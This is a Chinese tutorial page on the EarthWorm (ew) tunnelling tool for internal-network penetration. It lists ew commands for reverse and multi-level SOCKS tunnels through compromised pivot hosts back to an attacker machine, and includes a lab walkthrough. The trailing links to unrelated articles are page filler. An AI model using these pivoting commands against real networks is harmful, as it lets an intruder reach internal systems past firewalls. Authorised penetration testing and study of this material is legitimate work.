内网渗透-Earthworm的简单使用(内网穿透工具)

article/2025/9/26 13:23:02

Earthworm的简单介绍(一)

文章目录

  • EarthWorm下载地址
  • 1. 普通网络
    • 1.1 跳板机存在公网IP
      • 1.1.1 网络环境
      • 1.1.2 使用方法
      • 1.1.3 流量走向
    • 1.2 跳板机不存在公网IP,可出网
      • 1.2.1 网络环境
      • 1.2.2 使用方法
      • 1.2.3 流量走向
  • 2. 二级网络
    • 2.1 一级跳板机有公网IP
      • 2.1.1 网络环境
      • 2.1.2 使用方法
      • 2.1.3 流量走向
    • 2.2 一级跳板机无公网IP
      • 2.2.1 网络环境
      • 2.2.2 使用方法
      • 2.2.3 流量走向
  • 3. 三级网络
    • 3.1 网络环境
    • 3.2 使用方法
    • 3.3 流量走向

EarthWorm下载地址

https://github.com/AA8j/SecTools/tree/main/ew

1. 普通网络

在普通网络环境下,可直接通过跳板机访问内网特定资源。

1.1 跳板机存在公网IP

1.1.1 网络环境

目标主机(公网IP:1.1.1.1,可访问特定内网资源)(跳板机)

1.1.2 使用方法

目标主机(公网IP:1.1.1.1,可访问特定内网资源):

ew -s ssocksd -l 8888
  • 1
侦听本机的8888端口,提供socks代理
  • 1

1.1.3 流量走向

本地主机--->1.1.1.1:8888--->特定内网资源
  • 1

1.2 跳板机不存在公网IP,可出网

1.2.1 网络环境

攻击机(公网IP:1.1.1.1)
目标主机B(192.168.1.1,可出网,可访问特定内网资源)(跳板机)

1.2.2 使用方法

攻击机(公网IP:1.1.1.1):

ew -s rcsocks -l 1080 -e 8888
  • 1
侦听1080端口,提供socks代理
并且将1080的代理发送到8888端口,此时也侦听8888端口,等待反弹连接
  • 1
  • 2

目标主机B(192.168.1.1,可出网)(跳板机):

ew -s rssocks -d 1.1.1.1 -e 8888
  • 1
主动连接1.1.1.1的8888端口,打通隧道。
  • 1

1.2.3 流量走向

本地主机--->1.1.1.1:1080---->1.1.1.1:8888--->192.168.1.1--->特定内网资源
  • 1

2. 二级网络

在二级网络下,一级跳板机不能访问特定内网资源,二级跳板机可以访问内网特定资源。

2.1 一级跳板机有公网IP

2.1.1 网络环境

目标主机A(公网IP:1.1.1.1,内网IP:192.168.1.1,可访问主机B,不可访问特定内网资源)(一级跳板机)
目标主机B(内网IP:172.16.1.1,不出网,可访问特定内网资源)(二级跳板机)

2.1.2 使用方法

目标主机B(内网IP:172.16.1.1,不出网,可访问特定内网资源)(二级跳板机):

ew -s ssocksd -l 9999
  • 1
侦听9999端口,提供socks代理
  • 1

目标主机A(公网IP:1.1.1.1,内网IP:192.168.1.1,可访问主机B,不可访问特定内网资源)(一级跳板机):

ew -s lcx_tran -l 1080 -f 192.168.1.1 -g 9999
  • 1
侦听本机1080端口,并转发到172.16.1.1:9999
  • 1

2.1.3 流量走向

本地主机--->1.1.1.1:1080--->172.16.1.1:9999--->特定内网资源
  • 1

2.2 一级跳板机无公网IP

2.2.1 网络环境

攻击机(公网IP:1.1.1.1)
目标主机A(内网IP:192.168.1.1,出网,可访问主机B,不可访问特定内网资源)(一级跳板机)
目标主机B(内网IP:172.16.1.1,不出网,可访问特定内网资源)(二级跳板机)

2.2.2 使用方法

攻击机(公网IP:1.1.1.1):

ew -s lcx_listen -l 1080 -e 8888
  • 1
侦听1080端口,提供socks代理
并且将1080的代理发送到8888端口,此时也侦听8888端口,等待反弹连接
  • 1
  • 2

目标主机B(内网IP:172.16.1.1,不出网,可访问特定内网资源)(二级跳板机):

ew -s ssocksd -l 9999
  • 1
侦听9999端口,提供socks代理
  • 1

目标主机A(内网IP:192.168.1.1,出网,不可访问特定内网资源)(一级跳板机)

ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 172.16.1.1 -g 9999
  • 1
将1.1.1.1:8888和172.16.1.1:9999双向建立连接,打通隧道。
  • 1

2.2.3 流量走向

本地主机--->1.1.1.1:1080--->1.1.1.1:8888--->192.168.1.1--->172.16.1.1:9999--->特定内网资源
  • 1

3. 三级网络

在二级网络下,一级跳板机不能访问特定内网资源,二级跳板机也不能访问,三级跳板机才可以访问内网特定资源。

同上可以总结出,一级跳板机肯定是要能出网的,只是有公网IP和没有公网IP两种情况。

这里假设其没有公网IP(有公网IP的情况参考二级网络,更简单)。

3.1 网络环境

攻击机(公网IP:1.1.1.1)
目标主机B(内网IP:192.168.1.1,出网,可访问主机C,不可访问特定内网资源)(一级跳板机)
目标主机C(内网IP:172.16.1.1,不出网,可访问主机D,不可访问特定内网资源)(二级跳板机)
目标主机D(内网IP:10.1.1.1,不出网,可访问特定内网资源)(三级跳板机)

3.2 使用方法

攻击机(公网IP:1.1.1.1):

ew -s lcx_listen -l 1080 -e 8888
  • 1
侦听1080端口,提供socks代理
并且将1080的代理发送到8888端口,此时也侦听8888端口,等待反弹连接
  • 1
  • 2

目标主机C(内网IP:172.16.1.1,不出网,不可访问特定内网资源)(二级跳板机)

ew -s lcx_listen -l 9999 -e 7777
  • 1
同样也是侦听9999端口,提供socks代理
并且将9999的代理发送到7777端口,此时也侦听7777端口,等待反弹连接
  • 1
  • 2

目标主机B(内网IP:192.168.1.1,出网,可访问主机C,不可访问特定内网资源)(一级跳板机)

ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 172.16.1.1 -g 9999
  • 1
访问攻击机的8888端口和内网172.16.1.1的9999端口,将攻击机与C主机连通。
  • 1

目标主机D(内网IP:10.1.1.1,不出网,可访问特定内网资源)(三级跳板机)

ew -s ssocksd -d 172.16.1.1 -e 7777
  • 1
回连打通CD之间的隧道。
  • 1

3.3 流量走向

本地主机--->1.1.1.1:1080--->1.1.1.1:8888--->192.168.1.1--->172.16.1.1:9999--->172.16.1.1:7777--->10.1.1.1--->内网特定资源
  • 1

参考链接:http://rootkiter.com/EarthWorm/

Earthworm的简单介绍(二)

EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内,强烈推荐使用。

(简称EW)是一套轻量便携且功能强大的网络穿透工具,基于标准C开发,具有socks5代理、端口转发和端口映射三大功能。

优点:

1.可穿透复杂的内网环境。(这么说吧:我本地连着路由器开一个虚拟机,可以直接反弹到公网的云服务器上。)
2.以支持多平台间的转接通讯,Linux、Windows、MacOS、Arm-Linux均支持。

支持平台列表:(可跨平台反弹)

  1. ew_for_Win.exe 适用各种Windows系统(X86指令集、X64指令集) Windows7、Windows XP
  2. ew_for_Linux32 各常见Linux发行版 (X86 指令集 CPU) Ubuntu(X86)/BT5(X86)
  3. ew_for_linux64 各常见Linux发行版 (X64 指令集 CPU) Ubuntu(X64)/Kali(X64)
  4. ew_for_MacOSX64 MacOS系统发行版 (X64 指令集) 苹果PC电脑,苹果server
  5. ew_for_Arm32 常见Arm-Linux系统 HTC New One(Arm-Android)/小米路由器(R1D)
  6. ew_mipsel 常见Mips-Linux系统 (Mipsel指令集 CPU) 萤石硬盘录像机、小米mini路由器(R1CM)

项目地址:

https://github.com/idlefire/ew

利用:

打开项目的文件,里面非常清楚的写了如何使用,我们直接在里面复制命令使用即可

 一:在win7添加转接隧道,将 1080 收到的代理请求,转交给反连8888端口的主机

        把ew_for_Win.exe文件放到win7中,然后该文件目录下执行./ew -s lcx_listen -l 1080 -e 8888

 二:在kali主机上利用ssocksd方式启动9999端口的socks代理

       把ew_for_linux64放到kali中,然后该文件目录下执行./ew -s ssocksd -l 9999

 三:在 server2008主机上,通过工具的 lcx_slave 方式,打通win7 8888端口 和 kali 9999端口 之间的通讯隧道

        同样把ew_for_win文件放进server2008主机上,在该文件目录下执行./ew -s lcx_slave -d 192.168.1.48 -e 8888 -f 192.168.1.49 -g 9999

 四:kali主机输入python3 -m http.server 8988,然后kali本地区访问该端口

五:利用 proxifier工具,配置代理服务器,从而让主机访问自身的80端口,又因为配置了规则,此时将127.0.0.1转发给192.168.1.48的1080 再由192.168.1.48的1080端口转发给kali linux

六:设置转发规则

七:通过访问本地的8988端口,就可以访问kali linux任意端口


http://chatgpt.dhexx.cn/article/V0ZBVXQ0.shtml

相关文章

基于EarthWorm的正反向socks5代理

EarthWorm EarthWorm(ew)是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,可在复杂网络环境下完成…

earthworm系列-earthworm介绍

earthworm的官方网站:http://www.earthwormcentral.org 1 Earthworm 简介 Earthworm 项目始于1993 年,主要目的是为了解决美国地震区域台网出现的问题。当时,区域内的地震台网存在的主要问题有:观测设备陈旧,…

内网渗透工具Earthworm简单使用

EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限…

【内网—内网转发】——代理转发_ew(Earthworm)代理转发

文章目录 一、环境准备:二、工具:三、概念:四、学习目的:五、ew(Earthworm)介绍:六、ew(Earthworm)使用说明:七、ew(Earthworm)正向代理(适用于被控服务器拥有一个公网IP):1. 场景:…

苹果xsmax是什么接口_为什么苹果PD快充线头是银色而非金黄色?原来那根本就不是镀的银...

苹果开放第三方授权后,目前市面上已有不少苹果MFi认证的PD快充线,1小时就能充满iPhone X。苹果PD数据线,即USB-C to Lighting数据线,是苹果自家定义的一套数据线规范,一端为Type-C接口,另一端为苹果Lightin…

PD诱骗方案

方案1 如果在小制作中使用pd诱骗,可以参考国产方案 一个网友的设计 芯片手册提供的原理图如下 原理图1 原理图2 原理图3 原理图4 如果在一些小制作中使用还是比较方便的。 方案2 上面方案缺点仅支持PD2.0,不具有PPS,用于一些简单应用还是…

USB-PD 协议解析 - 简单易懂协议详解

目录 1. 简介 2. USB PD3.0 通信流程 2.1 发送数据包 2.2 接收数据包 2.3 双相标记编码(BMC) 2.4 符号编码(4B5B) 3. 数据包格式 3.1 前导码(Preamble) 3.2 SOP*(Start of Packet Sequence) 3.3 …

雷达干扰技术(一)PD雷达的特征

文章目录 1 多普勒频率2 PD雷达基本原理和组成3 PD雷达的信号特征 1 多普勒频率 雷达使用多普勒频率来提取目标的径向速度(距离变化率),以及区分运动和静止目标与物体,例如杂波。 多普勒现象描述了由于目标相对于辐射源的运动而…

详解PD3.0协议

通过65W充电头,给电池充电,中间有个充电芯片CCG3PA,电池可充可放,也就是PD的Power role可以是Source也可以是Sink。 在充电时的PD协议中的Device Discovery,通过SOP_Prime类型的消息进行交互,5个VDO包含了必要信息。其中cable VDO会告知自己是3A还是5A的线,不同的线能承…

PD-1和PD-L1到底是什么?

PD-1全称程序性死亡受体1,英文名字为Programmed Death 1,是一种重要的免疫抑制分子,为CD28超家族成员。以PD-1为靶点的免疫调节在抗肿瘤、抗感染、抗自身免疫性疾病及器官移植存活等方面均有重要的意义。其配体PD-L1也可作为靶点,…

药物相关 PK(药代动力) 、PD(药效)指标知识

1、PK(药代动力) Pharmacokinetic PK(Pharmacokinetics)主要研究药物在体内的吸收、分布、代谢和排泄过程,主要包括药物的药代动力学参数,如清除率、半衰期、分布容积等 PK代表药物的药代动力学&#xff…

pd.melt

一、函数 pd.melt( [frame, id_varsNone, value_varsNone, var_nameNone, "value_namevalue", col_levelNone] 参考官方文档 melt: V (使)熔化,融化 pd.melt将多列数据进行融合。 二、参数 id_vars: tuple, list, or ndarray, optional 用作标识符的列…

一文读懂USB3.1、USB Type-C、USB PD到底是什么?

USB3.1、USB Type-C、USB PD这几个英文单词应该是目前与USB接口相关的较热门的英文单词,大家或多或少都会在有意或者无意下接触到与其相关的一些信息,但是相对于大部分人来说也仅仅是知道有这么一个东东,但是对其功能及用途却并不了解&#x…

USB-PD 协议

USB-PD(Power Delivery)是基于USB Type-C的一种电源供电标准,最大供电功率可达100瓦(W);随着USB Type-C的普及,越来越多的设备(手机、平板、显示器、工作站、充电器等)使…

PD功能介绍

PD(Placement Driver),集成了ETCD, ETCD的Raft保证了数据的一致性; PD作用 整个集群TiKV元数据的存储分配全局ID和事物ID生成全局时钟TSO-事物开始时间、提交时间等搜集集群信息进行调度搜集Label功能支持高可用提供TiDB Dashboard功能 TSO physical …

python中pd是什么意思_python pd

广告关闭 腾讯云11.11云上盛惠 ,精选热门产品助力上云,云服务器首年88元起,买的越多返的越多,最高返5000元! 这里我们的目的是通过智能过滤器来减少查询cpu时间我想要通过其他数据框列名来过滤pd.read_sql中的列可能吗? 第1步:df1数据帧age1和age3是我未来的pd.read_s…

OBS多路推流插件使用方法(超级详细,亲测可用)

前提:OBS版本需要高于25.0 一、下载地址: https://download.csdn.net/download/longgeaisisi/12597711 二、下载后解压内含文件如下: 三、把这两个文件复制到你OBS安装目录下,覆盖: 四、重启OBS软件,这时…

视频直播推流与拉流的实现

序言 最近在研究直播的弹幕,东西有点多,准备记录一下免得自​​己忘了又要重新研究,也帮助有这方面需要的同学少走点弯路。关于直播的技术细节其实就是两个方面一个是推流一个是拉流,而弹幕的实现核心在即时聊天,使用聊…

直播推流优化|音视频开发

直播推流端是整个直播内容的生产源头。我们熟知的推流工具有:PC 推流工具 OBS、手持设备和各个直播平台的手机推流 App、针对一些复杂场景有更专业的导播台硬件等等。虽然工具众多,但推流端的整个工作流程还是比较固定的: 摄像头、麦克风采集…

OBS推流工具介绍及桌面录屏推流功能实现

OBS推流工具介绍及桌面录屏推流功能实现 文章目录 OBS推流工具介绍及桌面录屏推流功能实现1 OBS工具介绍2 OBS工具安装及简单使用2.1 安装步骤2.2 简单使用介绍 3 OBS实现桌面录屏推流工具实现4 总结 流媒体开发工程中,我们除了使用ffmpeg等工具辅助调试外&#xff…